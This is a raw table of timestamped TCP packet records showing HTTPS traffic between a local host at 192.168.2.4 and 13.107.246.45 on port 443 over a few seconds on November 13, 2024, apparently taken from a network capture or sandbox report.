Nov 13, 2024 18:44:47.206034899 CET	443	49961	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.206146002 CET	49961	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.206186056 CET	49961	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.206186056 CET	49961	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.206202984 CET	443	49961	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.206216097 CET	443	49961	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.208688974 CET	49966	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.208775997 CET	443	49966	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.209058046 CET	49966	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.209058046 CET	49966	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.209192991 CET	443	49966	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.211738110 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.211884022 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.211945057 CET	49962	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.212019920 CET	49962	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.212019920 CET	49962	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.212059975 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.212093115 CET	443	49962	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.213864088 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.213891983 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.213948011 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.214041948 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.214050055 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.508814096 CET	443	49964	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.509582043 CET	49964	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.509663105 CET	443	49964	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.510226965 CET	49964	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.510241985 CET	443	49964	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.642904043 CET	443	49964	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.642985106 CET	443	49964	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.643276930 CET	49964	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.643277884 CET	49964	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.643388033 CET	49964	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.643425941 CET	443	49964	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.646260023 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.646301985 CET	443	49968	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.646380901 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.646524906 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.646548033 CET	443	49968	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.906826973 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.907377958 CET	49965	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.907397985 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.907778978 CET	49965	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.907787085 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.960091114 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.960520029 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.960535049 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.961105108 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.961111069 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.977108955 CET	443	49966	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.977461100 CET	49966	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.977524042 CET	443	49966	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:47.977765083 CET	49966	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:47.977778912 CET	443	49966	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.037769079 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.037795067 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.037847996 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.037938118 CET	49965	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.038126945 CET	49965	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.038149118 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.038162947 CET	49965	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.038170099 CET	443	49965	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.040903091 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.040992022 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.041090012 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.041255951 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.041295052 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.093058109 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.093130112 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.093214035 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.093230963 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.093302965 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.093327999 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.093343019 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.093343019 CET	49967	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.093353033 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.093362093 CET	443	49967	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.095529079 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.095606089 CET	443	49970	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.095691919 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.095854998 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.095886946 CET	443	49970	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.121345043 CET	443	49966	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.121778965 CET	443	49966	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.121959925 CET	49966	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.121959925 CET	49966	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.123042107 CET	49966	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.123106956 CET	443	49966	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.124113083 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.124202013 CET	443	49971	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.124305010 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.124449015 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.124486923 CET	443	49971	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.779840946 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.780464888 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.780500889 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:48.781105042 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:48.781161070 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.062454939 CET	443	49971	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.063100100 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.063157082 CET	443	49971	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.063666105 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.063679934 CET	443	49971	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.066670895 CET	443	49970	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.067259073 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.067282915 CET	443	49970	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.067949057 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.067960024 CET	443	49970	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.182190895 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.182286978 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.182332039 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.182528019 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.182528019 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.182832956 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.182832956 CET	49969	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.182904959 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.182940960 CET	443	49969	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.185672998 CET	49972	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.185714006 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.185791969 CET	49972	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.185914993 CET	49972	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.185921907 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.195420980 CET	443	49971	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.195522070 CET	443	49971	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.195719957 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.195719957 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.195719957 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.197732925 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.197823048 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.197901964 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.198029041 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.198071957 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.198928118 CET	443	49970	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.199075937 CET	443	49970	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.199168921 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.199168921 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.199168921 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.201287031 CET	49974	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.201303005 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.201371908 CET	49974	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.201477051 CET	49974	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.201487064 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.498018026 CET	49971	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.498094082 CET	443	49971	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.513751984 CET	49970	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.513832092 CET	443	49970	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.704792976 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.705302000 CET	49963	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.705349922 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.705924034 CET	49963	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.705929995 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.859164953 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.859271049 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.859407902 CET	49963	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.859709978 CET	49963	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.859710932 CET	49963	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.859781981 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.859817028 CET	443	49963	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.862461090 CET	49975	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.862557888 CET	443	49975	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.862673998 CET	49975	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.862984896 CET	49975	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.863053083 CET	443	49975	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.921432018 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.921849966 CET	49972	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.921868086 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.922246933 CET	49972	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.922250986 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.946782112 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.947277069 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.947340965 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.947783947 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.947839975 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.959263086 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.959815979 CET	49974	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.959834099 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:49.960160971 CET	49974	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:49.960165024 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.053523064 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.053698063 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.053760052 CET	49972	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.053833961 CET	49972	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.053855896 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.053869963 CET	49972	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.053877115 CET	443	49972	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.056308031 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.056405067 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.056509972 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.056593895 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.056616068 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.081295013 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.081347942 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.081413031 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.081536055 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.081536055 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.081633091 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.081634045 CET	49973	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.081676006 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.081707001 CET	443	49973	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.083729029 CET	49977	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.083817959 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.083931923 CET	49977	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.084029913 CET	49977	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.084057093 CET	443	49977	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.093324900 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.093475103 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.093532085 CET	49974	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.093569040 CET	49974	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.093585968 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.093602896 CET	49974	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.093609095 CET	443	49974	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.095166922 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.095194101 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.095423937 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.095424891 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.095537901 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.189268112 CET	443	49968	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.189714909 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.189800024 CET	443	49968	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.190155983 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.190170050 CET	443	49968	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.347846985 CET	443	49968	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.348022938 CET	443	49968	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.348278046 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.348278999 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.348278999 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.350487947 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.350579023 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.350699902 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.350790977 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.350811958 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.596400976 CET	443	49975	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.597389936 CET	49975	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.597481966 CET	443	49975	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.597774029 CET	49975	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.597835064 CET	443	49975	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.654092073 CET	49968	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.654167891 CET	443	49968	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.750411987 CET	443	49975	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.750494957 CET	443	49975	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.750710011 CET	49975	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.750710011 CET	49975	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.750794888 CET	49975	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.750863075 CET	443	49975	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.753372908 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.753468990 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.753573895 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.753721952 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.753762007 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.796051979 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.796513081 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.796576977 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.796791077 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.796808004 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.829005957 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.829382896 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.829447985 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.829725981 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.829782009 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.926265001 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.926321983 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.926448107 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.926489115 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.926568985 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.926569939 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.928333044 CET	49976	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.928397894 CET	443	49976	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.928771019 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.928816080 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.928888083 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.928983927 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.928994894 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.958713055 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.958766937 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.958884954 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.958950043 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.958950043 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.959038973 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.959039927 CET	49978	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.959079981 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.959115028 CET	443	49978	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.960711956 CET	49982	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.960800886 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:50.960897923 CET	49982	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.960982084 CET	49982	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:50.961005926 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.092303991 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.092820883 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.092880964 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.093079090 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.093123913 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.230129004 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.230241060 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.230356932 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.230418921 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.230537891 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.230537891 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.230581999 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.231172085 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.231266975 CET	443	49979	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.231348991 CET	49979	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.232738018 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.232783079 CET	443	49983	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.232856035 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.232968092 CET	49983	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.232980013 CET	443	49983	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.519427061 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.519957066 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.520025969 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.520256042 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.520272970 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.657963991 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.658003092 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.658308983 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.658374071 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.658495903 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.658495903 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.658524990 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.658843040 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.658987045 CET	443	49980	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.659043074 CET	49980	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.659794092 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.660123110 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.660156965 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.660451889 CET	49981	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.660459995 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.660609961 CET	49984	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.660629034 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.660692930 CET	49984	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.660793066 CET	49984	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.660801888 CET	443	49984	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.761724949 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.762248039 CET	49982	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.762312889 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.762516022 CET	49982	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:51.762531996 CET	443	49982	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.787425041 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.787481070 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.787619114 CET	443	49981	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:51.787621975 CET	49981	443	192.168.2.4	13.107.246.45
